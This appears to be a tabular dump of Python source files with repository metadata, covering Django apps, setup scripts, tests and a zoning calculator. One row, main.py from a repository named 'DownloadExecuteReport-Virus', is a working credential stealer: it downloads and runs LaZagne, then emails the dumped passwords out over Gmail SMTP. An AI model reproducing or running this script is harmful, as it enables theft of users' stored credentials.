hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4c237eab0c099d5c3321cd95e513399431effe30 | 668 | py | Python | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | 4 | 2020-05-27T10:02:31.000Z | 2021-07-11T08:14:20.000Z | from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
] | 39.294118 | 117 | 0.754491 | 71 | 668 | 7.070423 | 0.408451 | 0.089641 | 0.039841 | 0.059761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08982 | 668 | 17 | 118 | 39.294118 | 0.825658 | 0 | 0 | 0 | 0 | 0 | 0.415546 | 0.31988 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c2609dfb8072ffe05951ef05454ba700de01952 | 789 | py | Python | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | [
"MIT"
] | 1 | 2020-03-02T20:55:04.000Z | 2020-03-02T20:55:04.000Z | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | [
"MIT"
] | 6 | 2020-06-05T17:18:41.000Z | 2022-03-11T23:14:47.000Z | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from django.db import models
from django.utils.translation import ugettext as _
class Group(models.Model):
"""
Group model
"""
title = models.CharField(max_length=256, blank=False, verbose_name=_('Name'))
leader = models.OneToOneField(
'Student', verbose_name=_('Leader'), blank=True, null=True, on_delete=models.SET_NULL)
notes = models.TextField(blank=True, verbose_name=_('Additional notices'))
class Meta(object):
verbose_name = _('Group')
verbose_name_plural = _('Groups')
def __str__(self):
if self.leader:
return '{} ({} {})'.format(
self.title, self.leader.first_name, self.leader.last_name)
else:
return '{}'.format(None)
| 29.222222 | 94 | 0.64512 | 91 | 789 | 5.307692 | 0.549451 | 0.113872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00491 | 0.225602 | 789 | 26 | 95 | 30.346154 | 0.785597 | 0.013942 | 0 | 0 | 0 | 0 | 0.076115 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.176471 | 0 | 0.647059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4c263e5689af5df6e8fbc9a6cee80e41efe505e2 | 2,319 | py | Python | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | [
"MIT"
] | null | null | null | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | [
"MIT"
] | null | null | null | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | [
"MIT"
] | null | null | null | from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
class IdentityClientMixin(metaclass=ABCMeta):
__publicKey = None
@property
@abstractmethod
def vendor_session_request(self) -> requests.Session:
pass
@property
@abstractmethod
def should_refresh_vendor_token(self) -> bool:
pass
@abstractmethod
def refresh_vendor_token(self) -> None:
pass
def get_public_key(self) -> str:
if self.__publicKey:
return self.__publicKey
logger.info('could not find public key locally, will fetch public key')
reties = 0
while reties < 10:
try:
self.__publicKey = self.fetch_public_key()
return self.__publicKey
except Exception as e:
reties = reties + 1
logger.error(
'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e))
logger.error('failed to get public key in all retries')
def fetch_public_key(self) -> str:
if self.should_refresh_vendor_token:
self.refresh_vendor_token()
response = self.vendor_session_request.get(
frontegg_urls.identity_service['vendor_config'])
response.raise_for_status()
data = response.json()
return data.get('publicKey')
def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True):
if not authorization_header:
raise InvalidTokenError('Authorization headers is missing')
logger.debug('found authorization header: ' +
str(authorization_header))
jwt_token = authorization_header.replace('Bearer ', '')
if verify:
public_key = self.get_public_key()
logger.debug('got public key' + str(public_key))
decoded = jwt.decode(jwt_token, public_key, algorithms='RS256')
else:
decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False)
logger.info('jwt was decoded successfully')
logger.debug('JWT value - ' + str(decoded))
return decoded
| 32.661972 | 108 | 0.639069 | 257 | 2,319 | 5.571984 | 0.354086 | 0.075419 | 0.050279 | 0.046089 | 0.103352 | 0.030726 | 0 | 0 | 0 | 0 | 0 | 0.005974 | 0.278137 | 2,319 | 70 | 109 | 33.128571 | 0.849462 | 0 | 0 | 0.175439 | 0 | 0 | 0.131522 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0.052632 | 0.122807 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c2897e16dece2ba4ecd2dbef042a4f90f011294 | 786 | py | Python | main.py | TheRavehorn/DownloadExecuteReport-Virus | 9df26706e504d1df33e07c09fa56baa28d89f435 | [
"MIT"
] | null | null | null | main.py | TheRavehorn/DownloadExecuteReport-Virus | 9df26706e504d1df33e07c09fa56baa28d89f435 | [
"MIT"
] | null | null | null | main.py | TheRavehorn/DownloadExecuteReport-Virus | 9df26706e504d1df33e07c09fa56baa28d89f435 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as f:
f.write(get_response.content)
def send_mail(email, password, message):
server = smtplib.SMTP_SSL("smtp.gmail.com", "465")
server.ehlo()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("youremail@gmail.com", "yourpassword", result)
os.remove("lazagne.exe")
| 24.5625 | 97 | 0.720102 | 110 | 786 | 5.054545 | 0.581818 | 0.053957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011782 | 0.136132 | 786 | 31 | 98 | 25.354839 | 0.807069 | 0.036896 | 0 | 0 | 0 | 0.043478 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.130435 | 0.26087 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c31c440814ac777bd4779fa4968cf1b1847bcac | 1,263 | py | Python | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | [
"Apache-2.0"
] | 47 | 2017-12-17T00:54:33.000Z | 2022-02-25T09:54:52.000Z | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | [
"Apache-2.0"
] | 125 | 2017-10-27T09:38:10.000Z | 2022-03-10T07:53:35.000Z | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | [
"Apache-2.0"
] | 50 | 2018-01-19T07:57:21.000Z | 2022-02-14T14:47:31.000Z | import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestServiceInstances(unittest.TestCase):
def test_create_update_delete(self):
client = build_client_from_configuration()
result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
if len(client.update_parameters) > 0:
client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
else:
_logger.warning("update test skipped")
client.v2.service_instances.remove(result["metadata"]["guid"])
def test_get(self):
client = build_client_from_configuration()
cpt = 0
for instance in client.v2.service_instances.list():
if cpt == 0:
self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
cpt += 1
_logger.debug("test_get - %d found", cpt)
| 43.551724 | 129 | 0.69517 | 145 | 1,263 | 5.786207 | 0.351724 | 0.066746 | 0.125149 | 0.200238 | 0.299166 | 0.261025 | 0.170441 | 0 | 0 | 0 | 0 | 0.010784 | 0.192399 | 1,263 | 28 | 130 | 45.107143 | 0.811765 | 0 | 0 | 0.086957 | 0 | 0 | 0.087886 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c | 553 | py | Python | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | """Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
description='Utiltiy functions for working with Myo Armband data',
author='Lif3line',
author_email='adamhartwell2@gmail.com',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 27.65 | 85 | 0.631103 | 64 | 553 | 5.359375 | 0.65625 | 0.093294 | 0.110787 | 0.151604 | 0.25656 | 0.25656 | 0.25656 | 0.25656 | 0 | 0 | 0 | 0.012019 | 0.24774 | 553 | 19 | 86 | 29.105263 | 0.8125 | 0.151899 | 0 | 0 | 0 | 0 | 0.345572 | 0.049676 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c43be0918680e081f3bcc9acc58506e39754d60 | 1,421 | py | Python | setup.py | jerzydziewierz/typobs | 15fa697386f5fb3a1df53b865557c338be235d91 | [
"Apache-2.0"
] | null | null | null | setup.py | jerzydziewierz/typobs | 15fa697386f5fb3a1df53b865557c338be235d91 | [
"Apache-2.0"
] | null | null | null | setup.py | jerzydziewierz/typobs | 15fa697386f5fb3a1df53b865557c338be235d91 | [
"Apache-2.0"
] | null | null | null | # setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="Jerzy Dziewierz",
author_email="jurek_pypi@dziewierz.pl",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
) | 36.435897 | 87 | 0.640394 | 152 | 1,421 | 5.914474 | 0.625 | 0.048943 | 0.062291 | 0.124583 | 0.151279 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010899 | 0.225194 | 1,421 | 39 | 88 | 36.435897 | 0.805631 | 0.152006 | 0 | 0 | 0 | 0 | 0.584654 | 0.060884 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.030303 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940 | 776 | py | Python | tests/test_selection.py | qrebjock/fanok | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | [
"MIT"
] | null | null | null | tests/test_selection.py | qrebjock/fanok | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | [
"MIT"
] | null | null | null | tests/test_selection.py | qrebjock/fanok | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | [
"MIT"
] | 1 | 2020-08-26T12:20:26.000Z | 2020-08-26T12:20:26.000Z | import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
| 27.714286 | 79 | 0.474227 | 135 | 776 | 2.674074 | 0.325926 | 0.055402 | 0.041551 | 0.044321 | 0.368421 | 0.368421 | 0.163435 | 0.163435 | 0.127424 | 0.127424 | 0 | 0.192884 | 0.311856 | 776 | 27 | 80 | 28.740741 | 0.483146 | 0 | 0 | 0 | 0 | 0 | 0.028351 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.043478 | false | 0 | 0.130435 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c49699fa44232922a69a87e2fa00808e22b315a | 7,256 | py | Python | unitcap/unit_cap.py | fintelia/habitationi | 7dd15ecbab0ad63a70505920766de9c27294fb6e | [
"Apache-2.0"
] | 1 | 2021-10-03T14:44:38.000Z | 2021-10-03T14:44:38.000Z | unitcap/unit_cap.py | fintelia/habitationi | 7dd15ecbab0ad63a70505920766de9c27294fb6e | [
"Apache-2.0"
] | null | null | null | unitcap/unit_cap.py | fintelia/habitationi | 7dd15ecbab0ad63a70505920766de9c27294fb6e | [
"Apache-2.0"
] | 1 | 2021-02-20T23:22:10.000Z | 2021-02-20T23:22:10.000Z | #!/usr/bin/python
# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
def get_caps(options):
far = {}
for i in ['A-1', 'A-2', 'B', 'SD-2']:
far[i] = 0.5
for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']:
far[i] = 0.6
for i in ['C-1', 'BA-3', 'IB-2', 'O-1']:
far[i] = .75
for i in ['BA-1', 'SD-12']:
far[i] = 1.0
for i in ['C-1A', 'SD-5']:
far[i] = 1.25
for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']:
far[i] = 1.5
for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']:
far[i] = 1.75
for i in ['BC', 'O-2']:
far[i] = 2.0
for i in ['C-2A']:
far[i] = 2.50
for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']:
far[i] = 3.0
for i in ['IA-2', 'IB']:
far[i] = 4.0
far['BB-1'] = 3.25
far['SD-11'] = 1.7
far['SD-15'] = 3.5
lot_area = {
'A-1': 6000,
'A-2': 4500,
'C-1A': 1000,
'BC': 500,
'BC-1': 450,
'IA-1': 700,
'SD-8': 650,
'SD-14': 800,
}
for i in ['IB-2', 'BA-1']:
lot_area[i] = 1200
for i in ['B', 'SD-2', 'SD-3']:
lot_area[i] = 2500
for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']:
lot_area[i] = 1800
for i in ['C-1', 'BA-3']:
lot_area[i] = 1500
for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']:
lot_area[i] = 600
for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']:
lot_area[i] = 300
for i in lot_area:
if options and 'lot_explicit' in options:
lot_area[i] = options['lot_explicit']
elif options and 'lot_factor' in options:
lot_area[i] = int(lot_area[i] / float(options['lot_factor']))
if 'no_lot' in options:
lot_area = {}
for i in far:
if options and 'far_explicit' in options:
far[i] = options['far_explicit']
elif options and 'far_factor' in options:
far[i] = far[i] * float(options['far_factor'])
if 'no_far' in options:
far = {}
return far, lot_area
def table(options):
far, lot_area = get_caps(options)
table = []
for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']:
table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,"")))
return "\n".join(table)
def unit_cap(row, options=None):
if not options:
options = {}
far, lot_area = get_caps(options)
zone = row['zone']
if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD":
return -1
if zone in ['A-1', 'A-2'] and not 'no_a' in options:
return 1
#print row
area = float(row.get('gis_lot_size',0) or 0)
if zone in lot_area and area:
m = max(area/(lot_area[zone]), 1)
else:
m = 100000
max_building = area * far[zone] * 1
if max(int(max_building/800), 1) < m:
m = max(int(max_building/800), 1)
if zone == "B" and not 'no_b' in options:
m = min(m, 2)
return m
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def compute_count(options = None):
conn = sqlite3.connect("prop.db")
if options == None:
options = {}
c = conn.cursor()
c.row_factory = dict_factory
m = 0
current = 0
for row in c.execute("SELECT * FROM lots"):
t = unit_cap(row, options=options)
if t == -1:
continue
m += int(t)
return m
def describe(options):
changes = []
if 'no_lot' in options:
changes.append("eliminate lot size/unit minimums")
elif 'lot_explicit' in options:
changes.append("set all lot size/unit minimums to %s" % options['lot_explicit'])
elif 'lot_factor' in options and options['lot_factor'] != 1.0:
changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor'])
if 'no_a' in options:
changes.append('eliminate single family zoning in A-1 and A-2 zones')
if 'no_b' in options:
changes.append('eliminate two-family zoning limits in B zones')
if 'far_explicit' in options:
changes.append("set all FAR maximums to %s" % options['far_explicit'])
elif 'far_factor' in options and options['far_factor'] != 1.0:
changes.append('increase FAR maximums by a factor of %s' % options['far_factor'])
if len(changes):
return ", ".join(changes)
else:
return ""
def serve(options):
d = open("unit_template.html")
template = Template( d.read() )
unit_count = int(compute_count(options))
data = {}
data['changes'] = describe(options)
data['unit_count'] = unit_count
data['increase'] = unit_count-37453
data['table'] = table(options)
data['options'] = options
s = template.render(**data)
return s
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# Send the html message
form = parse_qs(urlparse(self.path).query)
options = {}
for i in ['far_factor', 'lot_factor']:
if i in form:
options[i] = float(form[i][0])
else:
options[i] = 1.0
if 'far_explicit' in form and form['far_explicit']:
options['far_explicit'] = float(form['far_explicit'][0])
if 'lot_explicit' in form and form['lot_explicit']:
options['lot_explicit'] = int(form['lot_explicit'][0])
if 'lot' in form:
options['no_lot'] = True
if 'singlefamily' in form:
options['no_a'] = True
if 'twofamily' in form:
options['no_b'] = True
self.wfile.write(serve(options))
return
def run():
try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
#Wait forever for incoming htto requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
if __name__ == "__main__":
print run()
| 32.106195 | 108 | 0.553335 | 1,106 | 7,256 | 3.545208 | 0.230561 | 0.016832 | 0.032135 | 0.017853 | 0.185157 | 0.093344 | 0.057128 | 0.011732 | 0 | 0 | 0 | 0.045787 | 0.283627 | 7,256 | 225 | 109 | 32.248889 | 0.708542 | 0.098953 | 0 | 0.077348 | 0 | 0.005525 | 0.194355 | 0.006443 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027624 | null | null | 0.016575 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c4be3eb705a80e6147920908a86da5673e90f59 | 918 | py | Python | week4/string_format.py | MathAdventurer/Data_Mining | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | [
"MIT"
] | 1 | 2021-02-27T18:35:39.000Z | 2021-02-27T18:35:39.000Z | week4/string_format.py | MathAdventurer/Data_Mining | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | [
"MIT"
] | null | null | null | week4/string_format.py | MathAdventurer/Data_Mining | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
